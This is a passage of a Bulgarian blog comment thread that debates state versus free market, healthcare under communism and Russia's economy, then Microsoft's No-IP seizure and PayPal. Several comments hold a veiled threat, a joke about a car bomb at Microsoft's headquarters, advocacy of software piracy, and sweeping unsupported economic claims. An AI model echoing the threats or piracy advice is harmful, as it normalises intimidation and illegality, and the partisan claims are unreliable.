    Обаче изобщо не стои така въпроса с обикновеният пролетарии, каквито сме всички тук. По много стара информация Иван има своя фирма, която може и вече да я няма, не знам. Стил е бил частник, но вече по думите му не е. Но не е изключено в бъдеще пак да стане, ако реши да прави складови програми на дотнет 😉

    За сега повечето тук сме пролетарии така или иначе и точно така е в реалният живот. Тук пишат много хора от чужбина, който ако не са някакви роднини на президента, най-вероятно също са работници и служители. На всеки от средната класа, се падат хиляди трудещи се.

    Ние по презумпция имаме нужда от защита, защото няма винаги да сме млади и няма винаги да можем да работим и не е сигурно, че ще имаме деца, които да ни издържат, защото вероятно те ще си имат свои деца, които да издържат. А има и прекалено много неща, които трудещите се (дори тези с големите заплати), не можем да платим, а за нас са важни. Предполагам всеки се е сетил за поне две. Никой на заплата, по-ниска от тази на гореспоменатият президент, не може да си купи лечение и образование. А това означава 99,99% от населението. За съжаление поне първото ти трябва (ако ти потрябва) точно тогава, когато не си в състояние да изкараш пари, за да го платиш.

    Освен това азбучна истина е, че пролетариата не сме особено умни. Ако бяхме умни, нямаше да седим на заплата, а щяхме да изкарваме пари. Нали някой не си мисли, че за трети път споменатият президент, седи там за едната заплата?

    Тъй че да. Ако някому е нужна държава изобщо, това сме ние. И ни е нужна, за да мисли за нас и да ни подсигурява в случаите, когато не можем. А поради една или друга причина, такива случаи винаги ще има за точно всеки един човек.

    Отбраната и сигурността в днешно време не е аргумент. Днес има държави, но като се почне от тузарските квартали, мине се през всяка една компания и се стигне до селата, всеки си осигурява охраната сам. Така беше и през социализма. Така е и в най-развитите икономики.

    ––––––

    Тук да кажа и на Някой (той се е кръстил така даже с малка буква). Точно това твоето мислене е слугинаж. Не трябва някой друг да направи нещо, че да го приложим ние. Без да ми се обиждаш, но е така. Твоята теза е послушание, а не на Стил.

    В последващите си коментари доколкото виждам привеждаш само примери, защо не трябва да има държави. Например това, че те задължават да се ваксинираш, за да може някоя си там компания да направи някакви пари, а не е задължително наистина да има нужда. Да и ХЕИ (което по между другото отдавна не се казва ХЕИ, ама така си го знаят хората), не се занимава с ваксинации.

    По между другото да спомена, че въпросният дъмпинг на домати (и не само) е отново дело на държавната регулация. И забележи, че можем да му противодействаме само, ако той не идва от страна от ЕС. Ха познай най-нападащата ни с дъмпинг икономика (гръцката) дали е в ЕС.

    И не на последно място, редно е да си отговориш, ако една държава, може да произвежда по-евтино от нас, защото например има по-подходящи климатични условия, защо трябва да спираме вноса от там? Това не е рационално.

    Когато някой произвежда по-евтино от теб без зад това да стои държавна намеса, това не е дъпминг. Има умишлен дъмпинг, когато някой иска да завладее определен пазар и за тази цел продава на загуба. Но както вече уточнихме, не може да съществува (не и за дълго) монопол на свободен пазар и тогава тази мярка, ще е безпредметна. Ще завладееш пазара, но в момента, когато заработиш на печалба, друг ще те измести.

    Но по последните въпроси вече Стил е писал, а там мненията ни съвпадат, което е по-важно съвпадат с икономическата наука.

    По между другото това, което си извадил като цитат, не е посочено от къде е, но не е вярно Пазар е имало, има в момента и ще има и там дето няма държави. Контрабандата, ако не пазар, който не е санкциониран от държавата, какво е? Пазара винаги търси механизма да избегне държавите, защото държавите създават пречки. Ако държавите бяха добро за пазара, то нямаше да съществуват сива и черна икономика, а само бяла. Такива отрасли има не само у нас, има навсякъде, дори в най-богатите и уредени държави.

    ––––––

    Може би съвсем в страни да споделя едно свое наблюдение. Днес държавите са прекалено слаби, за да влияят на икономическите процеси. Имаме съвсем пресен пример. Администрацията най-силната свръхдържава в света, неотдавна реши да положи редица икономически ограничения на една от другите две свръхдържави, поради страх последната да не я измести от трона на водещ политически субект. В това начинание намери съмишленици сред повечето други силни държави. Обаче нищо от тези мерки не проработи. Големите компании от тези държави им е пределно ясно, че ако напуснат този конкретен пазар, то той моментално ще бъде завладян от техни конкуренти. А пазара е толкова голям, че това може да помогне на конкурентите им да ги изместят навсякъде другаде. И не само, че не приложиха решенията на своите правителства, ами обратно, засилиха връзките. И тези правителства (припомням, че сред тях е и най-силното правителство в света, световният хегемон, без който не се взима нито едно решение) не могат да направят абсолютно нищо. Единствените, които наистина въведоха някакви санкции (но не всички) бяха малки незначителни държавици, от които нищо не зависи и които само изгубиха от това. Едната Ви е добре позната, заедно с нейната северната съседка.

    Сега въпроса ни е, ако най-силната държавна администрация не може да направи това, което се предполага, че би трябвало да е елементарно за нея, то защо изобщо ни е държава? Ако не може да направи простото, как ще направи сложното?

    п.п. Кирчо, тази пица се плаща с карта, не с пари в брой. И това е само въведението. Ще го внедрят във всичките си ресторанти. На никой ли не му прави впечатление, че новината идва от РФ? В най-скоро време очаквам (да речем близките 30 години) РФ да стане най-развитата пазарна икономика. Индикациите са налице още днес. И изобщо не е само пицата. Доста изумителни неща дойдоха от скорошният санктпетербургски икономически форум и други икономически форуми по света. РФ расте в технологиите в небивали мащаби.

  54. Сол Says:

    Сол идва от солидарност, съкратено 🙂 А иначе не успях да изчета всичко тъй като любителите на свободния пазар сякаш си прекопирвате коментарите и ми става безинтересно към 5-тия ред. Краткия ми коментар е, че когато бедните защитават богатите само роботронната революция и алчността на последните могат да помогнат. Лесно е да си капиталист-демокрад на младини, но когато остарееш всичко от което имаш нужда е безплатно безусловно качествено здравеопазване и прилична гарантирана пенсия. Естествено във времена на краен индивидуализъм всеки гледа себе си и не го е еня за тези които не са успяли да се адаптират в препускащата технологична революция, но пък са завещали пътища, болници, училища и домове. Тяхната идея бе да са за всички, без разлика бедни и богати, но приватизацията еба мамата на пейзажа.

  55. Фьт Дхюс Says:

    Всъщност коментирах този въпрос и го признах за напълно валиден аргумент. Дали е достатъчен? Ами предполага се за 99,99% от хората е достатъчен. Кофти тръпката е, че съвременната либерална държава избира да не се занимава с това и по възможност изобщо да изчезне. А така изчезва и този аргумент държавите да съществуват.

  56. Фьт Дхюс Says:

    По между другото роботозирането, както всяка предишна индустриялна революция (и всяка следваща, ако тази случайно не свърши работата) е удар по пролетариата, а не по богатите. Твоят човек фантазира.

  57. Stilgar Says:

    @Фьт Дхюс е то Китай не се обсъжда, там никой нищо не плаща. Само дето всички искат да продават в USA и EU щото тука се прави голямата пачка от платежоспособните клиенти. Ние на нашите игри за 5 download-а в Холандия правим повече пари от рекламите от няколко хиляди в Индия.

  58. Stilgar Says:

    @Сол ами значи всичко е наред по твойта логика. Здравеопазването ни е безплатно, пенсионната система солидарна и задължителна. Явно нещата са както вие ги искате не както аз ги искам. Ама на мен това здравеопазване и тея пенсии не ми харесват затова искам да си уредя други ама никой не ме пита дали искам и ако не плащам ще ми вземат парите принудително със сила.

  59. Кирил Says:

    @Фьт Дхюс ако може без това Кирчо. Но Русия как ще стане най-развитата пазарна икономика? Не виждам нито един показател – държавата им ги съсипва почти всички наченки за бизнес, корупцията при тях е колкото при нас, правосъдната им система, като нашата е с мотото „за милиони няма закони“… Просто не виждам как ще го направят? Със сигурност ще дойдат много страхотни неща от там, но чак да станат развита икономика много ме съмнява.

  60. Сол Says:

    Стил, солидарни системи работят добре само при липса на частна собственост, иначе се източват. Ако не го знаеш можеш да сравниш преди и сега. Кое му е безплатното на днешното здравеопазване след като плащаш материали за всичко ? Разбирам липсата ти на избор, все пак можеш да отидеш в някоя офшорна зона, ако не друго. На Хаваите имат добри клиники. За мен пример за добро здравеопазване е Канада, но и там нещата отиват на зле защото много хамериканци бягат от щатската корпоративна здравна система когато работата е на умиране.

  61. Фьт Дхюс Says:

    Като не ти харесва, няма. Имам близък приятел, който се казва Кирил и му викаме Кирчо, та от там.

    Ами Кириле, как да ти кажа, грешна ти е информацията. Грешна е не в смисъл, че там няма корупция или, че местната църква е не по-малко пропаднала от тукашната, дето даже не искам да наричам наша или католическата. Нищо такова.

    Но РФ към днешна дата е една много развита икономика. Всички световни марки присъстват там със страхотни обеми. И всички техни заводи работят на пълни обороти, дотолкова, че не могат да отгорарят на търсенето. А иновации се въвеждат буквално всеки ден.

    Не съм гледал конкретните статистики как изглеждат нещата, но определено реалният сектор на РФ в момента се развива може би по-бързо и от този на КНР. След 2010-та там се случва някакво чудо.

    Обикновеният руснак най-вероятно не живее много по-добре от обикновеният българин, но това е нещо, което бързо се променя, а Москва е вторият европейски град по брой на богаташи. И това на фона, че така наречените олигарси намаляват.

    Всяка седмица идва новина за поредният мултимилиарден договор. Всяка седмица се говори за поредният завод в Якутия, грамадна нефтена платформа, рекорден добив или нов скъпоценен камък в някоя мина. Навсякъде във федерацията цари оживление.

  62. Фьт Дхюс Says:

    А да това, че видиш ли всяка наченка на бизнес се убивала и задушавала, най-малкото открадвала от тамошният еквивалент на мутрите, са легенди. Може и да е било вярно до към 2003-та. Но открай време определено не е. Поощрява се всичко ново, независимо от къде и кой идва, щом е ново и перспективно, веднага се тика в оборот. Изобщо не се бавят във въвеждане и инвестиции. В момента е златно време за бизнес там. Ако имах пари, щях да ги вложа именно там.А след двадесетина години седнали на чаша водка, щях да разправям, как Клондайк се е случил за мен.

    След като големите от всички сектори инвестират там като полудели, приказките колко били изостанали руснаците са легенди. Всъщност то е необходимо да се види просто някоя и друга снимка от Екатерининбург да речем. Нарочно не казвам от двете столици, а от някой голям провинциален град.

    Солидарен не може да се източи нещо, което се пази. Нали държавата беше добър регулатор, как така се източва? И накрая сам си противоречиш. И в Канада и в Хавайте има частна собственост, как така имат добра система?

  63. Сол Says:

    Канада в контекста на сегашното дередже Фът, а иначе както неведнъж споменах държавата не е някой тиранин паднал от Марс, тя е същите хора държащи фирмите и монопола на свободния пазар, сиреч защитаващи частните си интереси. Две мешани системи няма как да работят по никакъв начин, а иначе капитализма може да работи в чист вид да, безспорно, но за максимум 10% от населението, 1% елит и 9% паразити. Останалите са просто толкова промити от пропаганда за богатства, че въздишат по инвеститорите и възхваляват свободния пазар докато тяхното лично дередже се свежда до нищо повече от наемни работници.

  64. Фьт Дхюс Says:

    Сол преди пет години написах една статия, която за съжаление не мога да дам връзка. Мястото съществува, но е само с покани и тъй като вече не публикувам там (защото е Блогспот), то и покани не раздавам.

    Та в тази статия основната ми теза беше, че на пролетарият крайно не му пука, каква точно е системата. Той има двете си ръце, ризата на гърба и евентуално някаква малка собственост. Каква ще е икономическата система, не е въпрос, който променя битието му.

    Той при всички строеве ще си отстане работник. Аз никога не съм работил на държавна работа. Преди десети бях непълнолетен.

    Но пък добре помня, че майка ми работеше за 199 лв. и това беше след увеличението. А е започнала на 99.

    Аз днес получавам двойна заплата (и още сто отгоре) на жена ми, въпреки че двамата работим сходна работа. Ама тя е в общественият сектор. Нашата чистачка получава повече от нея. А няма даже средно. Нямаме човек да не е с поне двеста лева над нейните, дори и най-неквалифицираните ни работници.

    Тъй че повече клоня да работя за частник. Ама жена ми не си е сменяла работата от 7-8 години, пък аз за това време бях два пъти съкращаван, два пъти по заместване и веднъж даже уволнен, ами много важно. Пак с парите съм напред от това дето тя е изкарала.

    При всякакъв строи, кадърният няма да седи гладен. Разликата е, че при сегашният, освен че няма да е гладен, може и парици да понатрупа, ако е достатъчно предприемчив.

  65. Сол Says:

    Както ти казах, две мешани системи не са за коментиране. Още Мао през 70-те е казал, че социализма базиран на централна власт ще се изроди и номенклатурата ще иска капитализъм за да осребри властта си която преди това е била нематериална.
    Преди всичко, както добре го каза Чакъров, много неща по време на нашия социализъм не бяха видни и разбрани от хората като например това, че при средна заплата от 200лв към 89-та имаш 600лв скрити които получаваш под формата на здравеопазване, образование, субсидирани горива, храни и прочие. Не ми се навлиза в тая тема защото грешките свързани с организация и власт от онова време са многобройни, да не говорим за лични свободи… Но, идеята, идеята беше читава и си остава вечна! А тази идея изисква относително нематериално мислене за да бъде възприета, както и вродено чувство за грижа към другия. Неща като това, че здравия е хубаво да дава на болния, като това, че е по-важно да имаш безплатно здраве от айфон всяка година и още толкова много неща които не се вписват в простите сметки на капитализма изразени само в цифри, проценти, растежи и прочие сухотия която не е истинския живот в крайна сметка. Както се казва, човек и добре да живее, ако обществото около него не е добре, здраво и солидарно пак е нещастен, защото сме социални животни освен егоисти по природа.

  66. Фьт Дхюс Says:

    Сега процентите, които ни прибират за същите тези услуги не са много по-различни от тогавните. Голямата разлика и то съвсем отскоро е прогресивният данък, от отмяната на който всички спечелихме.

    Но нещо много бъркаш, като цитираш този Чакъров или както там му е името. Мисленето преди десети никак, ама изобщо никак, не беше по-малко материално от сегашното. Всяка втора дума беше маериализъм, диалектика, ленинизъм. Нищо по-бездуховно няма от това.

    А и Мао. Той е едно чудовище. Това е, човека направил културната революция, на която културно е само името, иначе си е обикновенно масово убийство на собственият народ.

    И да нищо вечно няма в система срутила се за 70 години. А буржоазната система, колко продължава? От френската революция има колко? Три века? Социализма по между другото също е от котилото на въпросната реолюция, само дето се оказа негоден да отрае и век.

  67. Stilgar Says:

    @Сол абе за здравеопазването не мога да говоря щото нямам спомени от преди 90те. Обаче понеже като изключим престъпността абсолютно всичко друго което помня беше по-зле ще си позволя да се съмнявам в легендата за хубавото соц. здравеопазване.

    Иначе не разбрах каква е грижата при капитализъм да си наемен работник?

  68. thd Says:

    Аз помня при соца че нямаше кво да се купи от магазина. Олио, бензин, захар и какви ли не продукти дето ги имаше в магазините бяха с купони(лимитед едишън 🙂 ). Имаше корекоми ама за да си купиш нещо от там трябваше или да си тираджия или да пратиш такъв познат дето има законни долари, щото иначе полицията после ще те бие много докато си кажеш от къде имаш долари 🙂 . Имаше карти за море и балкан по 15 дена смени в бунгала които бяха като консерва , малка палатка в дъсчен вариант, само че с много по богата флора и фауна от палатка вътре 🙂 . Общо взето пак си беше пълна корупция само че не с пари а с услуги или предметни награди и шуробаджанащина. Има и други весели неща ама сега няма време да ги пиша 🙂

  69. thd Says:

    П.П.: Бензина не от магазините де :–)

  70. Фьт Дхюс Says:

    Реално погледнато материално бяхме по-добре. Но това беше с помощ от село и крадене от заводите. Кой казва, че не е имало престъпност? Беше повсеместна. На нас ни се подиграваха, че не крадяхме. Виждаш ли какви тъпаци сме били.

    Здравеопазването може и да не беше велико, но във всеки град до най-малките имаше болница с пълен комплект отделения и като за без пари, нямаше какво повече да се желае.

    Положението с почивките също беше малко по-добро. Аз не съм ходил на море от две хилядната, на планина от 2012 (преди това бях за последно 2006). Тогава всяка зима се ходеше на планина и всяко лято на море. Вярно мизерийка, но природата си природа и почивката беше пълноценна.

    Сега е много, много по-луксозно и много, много по-скъпо. Не всеки може да ходи. От моите приятели, само тези, които работят в София, си позволяват да ходят по почивки.

    Както каза и Тхд, като лукс на живот, сега не може изобщо да се сравнява с тогава. Сега всеки има автомобил. Сега всеки има плазма. Сега всеки има двеста канала, от които примерно 20 порно и да речем 10 порно с педали. Сега ядем храна по най-високите европейски стандарти за качество. Всички работни места са изрядни, чисти, напълно оборудвани. Носим маркови дрехи, каквито не сме се сетили и си подновяваме гардероба минимум 2 пъти годишно, а не веднъж на 20 години. Всички имат климатици.

    Изобщо лукса днес е навсякъде. Тогава беше мизерийка, но беше евтинко и достъпно, и за най-изпадналия. А то реално изпаднали нямаше.

    Ако можем да отчетем някакво категорично предимство от тогава, то това е единствено, че живота беше спокоен. Днес е доста напрегнат и несигурен, но в крайна сметка, след като искаме луксозен живот, трябва да си го плащаме.

    Дори днес може да си живееш спокойно в мизерийка подобна на тогавашната, само че тогава щяха да те карат да работиш, а сега единствено ще трябва да се явиш за няколко часа в общината, след което да се наредиш на опашката за помощи.

  71. thd Says:

    А да, забравих. Имаше и заглушители на чуждите радиостанции за да не чуе някой нещо, което може да наруши спокойния му живот 🙂 Грижа за народа не че друго 🙂 да си е спокоен 🙂 Иначе криминалните прояви просто не се казват по новините, не че ги няма, даже помня че и обир на банка е имало, баха ги хванали или се бяха предали не помня и после ги бяха поразстреляли. Съда явно си е вършал по добре работата. Сега някакъв пиян дрислак гази 6 деца и му дават седем години, и вероятно ще излезе след по малко от половината.

  72. thd Says:

    А между другото в Китай за превишена скорост има затвор а за каране в нетрезво състояние екзекуция 🙂 дали карат пийнали там ? 🙂 За щатите съм чувал че ако те хванат да караш пил излизало около 60000 долара да те пращат по задължителни терапии или затвор, или беше за Канада .

  73. Фьт Дхюс Says:

    Не знам колко е глобата, ама тия холивудските най-редовно ги пращат по клиники като направят някоя подобна простотия. У нас като те видят кой си (примерно Бербатов) и те пускат.

  74. thd Says:

    Еми оня с кънките как се одухти и се замълча всичко.

  75. Фьт Дхюс Says:

    А бе щом най-обикновена мутра може да се измъкне безнаказан по сред бял ден, какво си говорим?! Не знам как спи нощем тоя изрод. Ония директно щяха да го разстрелят. Ама лошото е, че разстрелваха и ако просто не си им симпатичен.

  76. intel Says:

    Чета коментарите и следя мисъл след мисъл, но едно не ми става ясно:

    Щом на всички ни е ясна ситуацията – какво чакаме?
    Щом всички сме толкова добри анализатори и наблюдатели, защо само седим и правим сравнения 😀

    А иначе по темата – истината е че в живота всичко е на принципа: хем боли, хем сърби.

    Нагледно бих го описал със следния пример:
    Хем искат секс с готината мацка/пич на бара, хем после да не се занимават с нея/него.
    Хем да излязат заедно с приятели, хем да не се занимават с проблемите им, а само да си говорят за готините неща от живота и да има само забавление. (в днешно време да намериш добър приятел, а не просто познат си е голям късмет).
    Хем искат да взимат пари за работата си (и то добри пари), хем се чудят как по-бързо да им мине времето на тази работа (или вече им е писнала и/или просто са добри само в това).
    Хем искат живота им да е подреден както те искат, хем да не си дават зор, това да се случи и т.н. и т.н.

    И на тези хора като почнеш да им говориш за политика/общество – те или ще те гледат тъпо и ще се чудят как да те разкарат, или просто ще ти теглят една майна и ще те зарежат, а ако се наложи, може и да ти „върнат услугата“ като ти набият канчето за „благодарност“.

    Знам че всичко това е пропито с баналност, но това си е реалността – няма какво да се направи 🙂
    Така че, трябва първо на ниво хора да се fix-нем, и чак след това да изглаждаме обществото, държавата, че и целия свят като цяло…

    И имам един въпрос към всички – кога за последно искрено сте си казвали на себе си: „Ех искам да приличам на този/тази“?
    Без значение дали сте си го казали от завист или от възхищение.
    Отговора на този въпрос говори достатъчно за това, дали скоро ще се променим като хора, а от там и като общество, държава и като свят 🙂

  77. thd Says:

    След няколко десетилетия изкуствено и умишлено затъпяване на народа още от училище … 90% от хората разсъждават „Ааа вярно е беее, даваха го по телевизията …“

  78. Фьт Дхюс Says:

    Специално за себе си нямам големи очаквания от живота и нямам големи планове. Бил съм на дъното много пъти и още утре сутринта мога пак да съм там. Няма как да си правя големи планове. А познавам хора на моята възраст с вече изписани по две, по три трудови книжки. Имам да ги гоня. Предполагам поне едно 80% са на това дередже.

    Макар, че с години гледах как хора взимат големи ипотеки и се чудих с кой акъл и как ще ги плащат. Някои хора вярно останаха без апартаментите си, но други продължават да си ги плащат. Слабите дето не можеха да устискат ударите на живота си загубиха жилищата. А уверените и устремени не.

    Това е мое мнение, не ангажирам никой с наблюденията си. Изобщо не се старая да приличам на някой, защото този не е аз. Познавам и други хора мислещи така. Ако приличаш на друг, няма да си себе си.

  79. intel Says:

    Този въпрос отговаря на доста повече неща от колкото си мислите. Най-малкото – ако сте си казвали, че искате да приличате на някого, то вие имате поглед над себе си и знаете, че не сте това на което се възхищавате/завиждате.

    Когато не знаеш, какъв искаш да си или не знаеш какво искаш – тогава е най-трудно.

  80. Фьт Дхюс Says:

    Интеле ти психология ли си учил брат? Я раздухай повечко, че ми стана интересно. Завиждам на тези (ако ги има) дето имат пределно ясна идея, какво искат да направят и го правят, без да се отклоняват.

    Да спомена, че при Васил се появиха записите от Бургас Конф 2014. В момента ги тегля и довечера, ако жената не ме занимава много с глупости, ще ги изтегля.

  81. thd Says:

    И аз не го схванах нещо това с на кой искате да приличате. Аз съм иниукален, единствен и неповторим бре 🙂 🙂 🙂 как ще приличам на някой хяхя а и неотразим забравих да добавя (не задруго ами щото огледалото се напуква като ме види 🙂 🙂 🙂 ).

  82. Stilgar Says:

    По повод почивките един приятел (по-възрастен от мен с ясни спомени за онова време) разправя, че когато майка му му обяснявала колко било хубаво и как преди всяка година са ходили на море той отговарял – „Ами и аз сега ходя на море всяка година… в Тайланд“

  83. Фьт Дхюс Says:

    Да както казахме, днес живота е далеч по-луксозен. Само с уговорката, че не всеки ходи днес на почивка. Но със сигурност всеки (без най-крайно изпадналите от обществото) живее много по-добре.

  84. Кирил Says:

    За здравеопазването по комунизма – имало е 2 типа болници – едните за пролетариата и други за комунистите и техните роднини и близки хора. Просто номера е, че в болницте за комунистите не можеш да се запишеш без да имаш връзки.
    Така, че не ги говорете тези неща, че здравеопазването е било безплатно. Обикновенните хора просто не са знаели, че има други лескарства освен аспирин и аналгин. Майка ми е била в обикновенна болница и успяла да отиде и в болница от вторият тип – разликата в отношението и лечението е от земята до небето. Така, че просто преди хората не са се усетили, че има по-добро лечение за „наши“ хора.
    А и не забравяйте по комунизма не е имало подкупи а подаръци. По комунизма я питайте дали някой е помислял да отиде да доктор без подарък. Даже ако имате възможност понаблюдавайте пенсионери при доктор – някой от тях още са запазили навика да ходят с чанта предназначена за лекаря. А когато доктор иска подкуп да знаете, че това е навик създаден от комунизма.

    А сегашно време пак нямаме безплатно здравеопазвене – просто здравеопазването се плаща от данъците. Баба ми наскоро и се наложи да се оперира в държавна болница – тя се превива от болка и операцията трябва да се направи възможно най-бързо. Лекаря най-спокойно си заявява, че иска една сума да му се даде или да си запишем чаз за след 2 дни да прегледа баба ми в кабинета си и да прецени дали да я оперира. Сега ако държавата не взимаше данъци от майка ми и баща ми, може би щяха да имат спрестявания за да закараме баба ми на частна болница, където пак щяха да искат да платим, но поне нямаше да го има този рекет и тази гавра с хората. Да не казвам, че операцията я направи толкова качествено на левият крак, че на контролният преглед снимаше десният…

  85. Stilgar Says:

    Еми значи тогава здравеопазването е било по-добро. Сега няма от хубавите болници за избрани – унищожиха ги тея демократи!

  86. Кирил Says:

    А за почивките – ако потребявате колко по комунизма – минимална и евтина храна(няма да дебелеем я), нямате кола(нямате разходи) и купувате дрехи, обувки, мебели и други както по комунизма(покупката трябва да е празник, веднъж на няколко години, че да се се помни) и вие ще можете да си позволите да ходите на почивка веднъж в годината, че даже и на по-луксозно място.

  87. Кирил Says:

    То сега има частни болници – пак не са за всеки, но имаш по-голям шанс да събереш парите за тях, отколкото да имаш братовчедка – ятачка. Когато комунистите са се били срещу царската власта ятачките и ятаците са им помагали и затова по времето на комунизма са били „по-равни“.

  88. Кирил Says:

    Комик говори на тема за неутралността на мрежата:
    http://www.youtube.com/watch?v=fpbOEoRrHyU
    на английски е, но е много добро.

  89. intel Says:

    @Фьт Дхюс, накратко: Ние не можем да погледнем себе си, какво остава да погледнем към другите – че чак и да мислим за тях. От това няма как по-ясно да го кажа 🙂

    Затова няма да имаме скоро свястна алтернатива за управление. Всеки си се оправя както може и чака да му дойде до неговата глава, за да направи нещо по-въпроса.

    Всеки божи ден срещам поне по 3-4 просяка на път за работа. И почти винаги са различни хора. Не знам колко е било мизерно през соца, но сега не е по-добре.
    Гледаш кола за 200 000лв. и до нея двама просяка ровят в кофата и мятат боклука до същата тази кола…

    Скоро ще дойде момента и лекарите ни да просят (защото този момент е сравнително близо – 15-20 години, ако продължаваме така с изборите).
    В момента няма нито една едничка държавна болница, която да не е на загуба. И тези загуби се трупат.
    Повечето частни болници също са на загуба, защото не може да лекуват само богаташите (явно не са достатъчно много).

    Както и да е, радвам се че имате поглед над нещата.

  90. Сол Says:

    Интел, на хората няма да им уври акъла докато всички не станат просяци. Но поради чисто човешката природа винаги ще има хора готови на всякакво лизане за да бъдат в ако щеш кола за 20 хил.лв които отново няма да виждат просяка до себе си или по-скоро ще го наричат – тъп и грозен, неуспял да се адаптира към тази иначе прекрасна система. Съгласен съм с всичко казано от теб и на мен същите неща ми правят впечатление всеки ден и това да дадеш пари на някой да се нахрани или да му купиш храна не променя нищо освен 10 минути чиста съвест… Уви броя на хората които са в това състояние далеч не е малък и никой не е застрахован, особено след като остареят наследствените жилища на мнозинството от хора… За болниците, днес чета, че университетска болница в Ст. Загора която е една от най-големите в областта спира да включва храна за болните… Освен мизерния държавен бюджет нямам никакво съмнение, че умишлено я фалират за да процъфти някоя частна клиника в региона, но както сам каза, те също са на загуба тъй като в частна клиника могат да се лекуват малцина…

  91. thd Says:

    @intel, тия просяци има някои дето „изработват“ 50-100 лв на ден , ходят и се прибират с такси на „работа“…

  92. Фьт Дхюс Says:

    Протестите доколкото си спомням ги правеха „красивите“ и се подиграваха на „грозните“. Защо се учудваме, че няма солидарност към тях? А то всъщност има. Около 30% от моя (и на всички тук) доход отива точно за тази солидарност.

    И все пак е по-добре. Който не може да се нагоди към сегашната система — рови в кофите, което е пак вид нагаждане. Който не може да се приспособи към социалистическата, го пращат в Белене, Скръвена илидруги подобни приятни места.

  93. Stilgar Says:

    Че не е ли факт, че който живее зле не се е адаптирал към сегашната система? То това е по дефиниция независимо каква е системата 🙂

  94. бацето Says:

    Страхотен филм за Aaron Swartz. Ако го сваляте най-добре с bittorrent.

    https://archive.org/details/TheInternetsOwnBoyTheStoryOfAaronSwartz

    Fu*k microsoft – пълни идоти
    http://thehackernews.com/2014/06/microsoft-seized-no-ip-domains-millions.html
    Следваща стъпка е да пробват да сринат тор, и да забранят криптографията. Л@йнари.

    Fu*k paypal – другите идиоти
    http://thehackernews.com/2014/07/paypal-freezes-275000-campaign-funds-of.html

  95. бацето Says:

    Вместо м$ тъпанарите да си оправят пробитата система, те се опитват да изловят всички престъпници, като по този начин abuse-ват нормални потребители. Страхотна идея на страхотни умници, успех!
    По същата логика трябва да се забранят всякакви ножове и вилици. Или да изловим всички престъпници и да премахнем ключалките и входните си врати. Тези ключалки представляват система, която не е пробита като уиндолс и осигуряват сигурността на хората [против голям процент от крадците].

  96. Stilgar Says:

    Гадно ли ти е? 🙂

  97. бацето Says:

    Да ми е гадно от тяхната простотия? По скоро са ми смешни, аз не завися от тях.

  98. thd Says:

    Микромеки освен да си сринат нова версия на ОС-а на презентацията му, друго не могат да сринат.

  99. някой Says:

    Стилгар, не знам за него на мен ми е гадно, да. Микромеките прекачиха границата и по мое мнение вече са терористична организация, познай какво говори това за теб. Не ми се ще, ама май ще ми станеш цел и то не само на мен.

  100. thd Says:

    Ъъъ @някой с тоя уиндоус дето го ползваш и с тия приказки дето ги говориш малко не се връзва нещо 🙂 Малко като мисиоманин фанатик , дъвчещ свинско си 🙂 хяхяхях.

  101. някой Says:

    тхд кой какво ползва няма значение в случая, аз не те бутам да седиш на някоя определена ОС или браузър. Как определяш кое се връзва и кое не, странни аналогии правиш. Коментарът ти е достоен за някой тинейджър, пак добре че не редуваш шрифта. Смешното в случая е че някои хора още бъркат проституцията с капитализъм и когато почнат да пречат достатъчно, ще започнат и да си патят от глупостите, пък нека винят после някой друг.

  102. thd Says:

    @някой, по твоята теория Stilgar е терорист щото ползва уиндоус. Аз тъй го разбрах от коментара ти. Следователно след като и ти го ползваш …

  103. някой Says:

    хаха, не щото го ползва, а защото подкрепя глупостите на корпорацията производител, а поредната и беше тази да нападне нещо безплатно. Моят уин е пиратски аз съм си го преправил както ми е удобно на мен и даже призовавам всеки който иска да го ползва да прави същото, с което ще наруши един куп от глупавите им лицензи които са гарантирани с абсолютно нищо. И разните там хлапашки стереотипи тип „аз съм „хакер“ щот ползвам линукс“ и преди 10 години биха звучали смешно, не знам защо има хора още да изпадат в тези простотии. Примерно аз знам слабостите на бозата щото я ползвам и нея.

  104. thd Says:

    @някой , а сигурен ли си, че нямаш нужда от някой специалист ? Да те прегледа само 🙂 ?

  105. някой Says:

    Виждам че не можеш да зададеш някакъв смислен въпрос, може би е по-добре другите да пишат вместо да се напъваш 🙂

  106. thd Says:

    @някой, аз съм на ясно, че не съм квалифициран да ти помогна. Просто исках да разбера дали знаеш, че имаш нужда от професионална помощ 🙂

  107. Фьт Дхюс Says:

    Само не разбрах Стил, какво общо има? Той не работи за М$. Не, че не би работил, ако го поканят, ама май изискванията им са прекалено големи. Все пак и те са прекалено големи.

  108. Stilgar Says:

    Почвам да се оглеждам вече от къде ще изскочат да ме бият. Май ще трябва да викна на помощ нинджите на Microsoft – http://xkcd.com/225/

  109. gat3way Says:

    На работа имам на монитора завещана една лепенка „telerik .net ninja“. Мога да я отлепя и да ти я дам да всяваш респект 🙂

  110. Stilgar Says:

    Аз едно време си мислих, че са много cool тея лепенки и тениски, но после видях колко лесно ги дават и вече не искам да имам такава.

    Иначе нали съм ви казвал конвенцията?

    Java Jedi
    .NET Ninja
    Ruby Mage

  111. някой Says:

    Фът, хайде сега да не се правим че не знаем за какво става въпрос. На стилгар глупостите не ги чета от вчера и сигурно съм там в онази „десятка“ изслушали всичките подкастове, много добре му знам позицията въпреки че понякога я мени колкото за „флейма“. А „нинджите“ на микромеките още не могат да оправят бъкиите които надробиха http://www.pcworld.com/article/2450140/microsoft-admits-technical-error-in-ip-takeover-but-noip-still-down.html

  112. Кирил Says:

    В крайна сметка paypal са пуснали кампанията на protnomail, така че нещата са се оправили: https://protonmail.ch/blog/paypal-freezes-protonmail-campaign-funds/
    Но остава въпроса дали такива спирания са случайни. А има и спрени проекти като например конкуренция на очилата на гугъл за 150 000 долара. А и когато са им спрели финансирането даже не са ги уведомили.
    А още по-добрата новина е, че хората са събрали достатъчно да започнат проекта, така че всичко би трябвало да се оправи. Но си остава съмнението до колко може да се разчита на paypal. А е добре и да има алтернативи. Например когато paypal са ги прецакали, хората са започнали да ползват биткойни и кредитни карти за дарения.

  113. бацето Says:

    Въпроса „дали такива спирания са случайни“ е риторичен.

  114. Stilgar Says:

    Няма ли някоя кола от вашите да се засили и да се взриви в централата в Redmond? 🙂

  115. бацето Says:

    Образно казано, Гну/Линукс взривява основите на м$ от самото си рождение. 😀

  116. Фьт Дхюс Says:

    Ами не е точно така. Борбата на ГНУ е била против Юникс (ГНУ не е Юникс). Години след това друга ще е господстващата ОС и ще излезе на радара. Но тогава вече и Линус се появил и други хора. Доста по-късно е станало.

  117. бацето Says:

